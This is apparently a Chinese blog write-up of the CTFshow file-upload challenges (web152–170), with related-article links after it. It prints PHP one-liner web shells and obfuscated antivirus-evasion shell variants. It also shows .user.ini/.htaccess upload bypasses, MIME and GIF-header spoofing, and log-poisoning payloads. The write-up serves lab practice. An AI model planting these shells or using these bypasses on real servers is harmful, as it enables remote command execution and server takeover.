CTFSHOW 文件上传

最新推荐文章于 2024-02-02 23:56:47 发布
最新推荐文章于 2024-02-02 23:56:47 发布
阅读量345 收藏 1
点赞数
分类专栏: 学习思路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51754713/article/details/114127571
版权

开启文件上传

先补充一些知识

1.一句话木马

<?php @eval($_POST['attack']) ?>

只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。

2.中国蚁剑的使用
在这里插入图片描述此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。

web152

在这里插入图片描述
解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。

知识点:
①一句话木马的制作:我们使用Notepad++编辑图片,在图片末尾加入我们的一句话木马。在这里插入图片描述②burpsutie中repeter:
在这里插入图片描述红色方框就是我们要将png修改为php。然后从网页中访问。

web153

解题思路:本题我中我们发现通过修改发送包为1.php不可行。上网查阅了后发现,本题考点为.user.ini。这时候我们应该通过先上传一个.user.ini文件,并且文件的内容是auto_append_file=’'1.png这里我们可以直接在bs中的repeter中修改文件名和内容,无需重复上传。
在这里插入图片描述然后我们在upload目录下post一下1=phpinfo();
再用蚁剑连接得到flag。

知识点:

①如果你目录下有user.ini会先去识别里面的配置。当然文档也说了,并不是所有的配置都可以识别。只有 PHP_INI_PERDIR 和
PHP_INI_USER 模式可以。
②.user.ini理解.user.ini

web157

解题思路:题目中过滤了],},php。这时候我们要构造一句话木马就变得困难了。这时候通过对.user.ini的理解。我们可以直接让我们的一句话木马改为获取flag的命令。
payload:
1.png里内容为 <? system("nl ../f* ")?>
2.user.ini 里内容为 auto_prepend_file=“1.png”
3.直接访问index.php 查看源码获取flag.

web160

解题思路:题目中基本过滤了过滤了括号反引号还有一些关键字,因此我们使用日志包含。
构建图片文件内容为<?=include"/var/lo"."g/nginx/access.lo"."g"?>
然后上传.user.ini
最后修改UA为一句话木马
在这里插入图片描述
知识点:
在这里插入图片描述!!!!!!!!!!!!!!
需要补充为什么这个物理存放路径在这里?是一般情况都存这里还是啥

web161

解题思路:比160多了一个图片验证 所有加上GIF89a就行了
文件上传漏洞之getimagesize()类型验证

web162

!!!!!!!!!补

web166

在这里插入图片描述
解题思路:查看源码后发现只能上传zip文件,这时候我们上传一个含有一句话木马的zip文件。并且注意观察url的变化。
在这里插入图片描述
然后我们在这个地址下构建POST,领1=phpinfo();
再用蚁剑连接。
知识点:

这里为啥直接访问upload/download.php?file=6943ab35cd43100186ebfc5f4069df58.zip就可执行一句话木马?
因为在后端的download.php代码中包含了我们上传的文件,也就当作PHP代码执行了。

web167

解题思路:查看源码发现只能上传jpg的文件。查阅资料发现本题的环境是apache。再查知道了本题的考点是与.user.ini对应的.htaccess。因此改包
在这里插入图片描述
意思为将所有后缀为jpg文件的改为php文件。
这时候我们直接访问文件(还是访问上传的jpg文件),蚁剑连接就行了。

web168

解题思路:本题考查免杀,查阅发现过滤了eval,和system。

参考大佬的免杀

<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>

<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>

<?php
$a=strrev('metsys');
$a($_REQUEST[1]);
?>

<?php
$a=$_REQUEST['a'];
$b=$_REQUEST['b'];
$a($b);
?>

web169

解题思路:查看源码发现本题要上传zip文件,传过去发现也不符合规范,难倒了。
上网查了才知道,
前端验证zip,后端验证Png。
抓包,将后面的MIME类型改为image/png。这时候再上传就能成功。
然后利用日志包含.传递.user.ini 内容为auto_prepend_file=/var/log/nginx/access.log
再上传一个php文件,改掉UA头为一句话木马。
最后访问该php文件,蚁剑连接。

web170

同上

k1he
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
木马免杀方式
Shinyhuang_的博客
01-05 6160
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
ctfshow web入门 文件上传前篇(web151-web160)
ccfly1012的博客
09-17 1053
目录 web151-web152 web153 web154 web155 web156 web157-web159 web160 web161 web151-web152 首先写一个一句哈: <?php @eval($_POST["1"]);?> 然后修改文件后缀为png(题目限制),上传文件同时进行抓包,然后修改后缀php,然后蚁剑连接,找到flag 拿到flag~~~~ web153 使用.user.ini绕过 .user.ini 摘抄...
CTFshow--web入门--文件上传
qq_46874275的博客
04-24 1786
~目录~开始web151 改后缀 / 禁jsweb152 改后缀web153 .user.iniweb154、155 .user.ini + 短标签web156 {}web157、158、159 反引号执行命令web160 日志包含绕过web161 幻术文件头web162、163 session文件包含+条件竞争 开始 挑简单的先来 web151 改后缀 / 禁js 上传一个一句话,要求是图片格式,否则传不上去 <?php @eval($_POST['a']) ?> 然后抓包修改后缀为php
CTFSHOW web160 文件上传
Mirror_iu的博客
07-26 1111
CTFSHOW web160详解
CTFshow之web151~160---文件上传(上)
金 帛的博客
06-02 1631
ctfshow的wp
phar://、zip://伪协议进行shell上传
weixin_43749601的博客
06-18 1207
phar:// 环境:可上传png、jpg 首先写一个一句话木马shell.php接着压缩成zip文件。将后缀改为png文件进行上传,上传文件后使用shell工具进行连接。 http://localhost/?url=phar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.png/shell zip:// 环境:可上传png、zip 首先写一个一句话木马shell.php接着压缩成zip文件。直接上传zip文件,然后使用shell工具进行连接。 htt
文件上传漏洞(全网最详细)
2201_75362610的博客
01-12 1068
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
ctfshow -web文件上传
最新发布
m0_72898152的博客
02-02 754
ctf
CTFshow 文件上传 web160
Kradress的博客
02-15 554
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 继续用取反来解 取反脚本 $a = "data://text/plain,<?php system('tac ../f*');?>"; echo "~("; for ($i = 0; $i < strlen($a); $i++) { echo "%".bin2hex(~$a[$i]); } echo ")"
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFshow——文件上传
D.MIND 的博客
02-23 1273
目录:web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验 发现只能上传PNG文件,上传一个图片马,用Burp抓包修改文件后缀  1.在upload/xx.php页面结合一句话木马  2.用蚁剑、菜刀连接 web153——.user.ini配置文件 细看:.htaccess和.user.ini配置文件妙用 如
CTFshow web入门——文件上传
小元砸的博客
03-14 9923
Web 151
ctfshow-web入门 文件上传篇部分题解
volcano的博客
03-06 6475
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
ctfshow WEB入门 文件上传151-170
byname1的博客
01-07 1239
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow [web] 文件上传 156--160
weixin_68906365的博客
02-18 257
可以在User-Agent处写入php代码,在包含日志文件时就可以执行该代码。.user.ini 文件可以正常上传,可以先上传.user.ini 文件然后再上传写有木马的png图片,然后访问/upload页面。可以上传.user.ini文件,new.png也可以正常上传,操作和上题一样。过滤了空格,导致原 .user.ini 文件无法正常上传。可以上传 user.ini 文件,不过木马上传失败了。看了一眼题解,发现括号被过滤了,需要用反引号执行命令。短标签开启:(配置文件:php.ini)
ctfshow文件上传
09-02
对于CTF Show文件上传的问题,我可以给您一些基本的指导。 在CTF(Capture The Flag)比赛中,文件上传通常是一个常见的题目类型。这类题目要求参赛选手利用漏洞或者绕过限制,成功将文件上传到目标服务器上。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值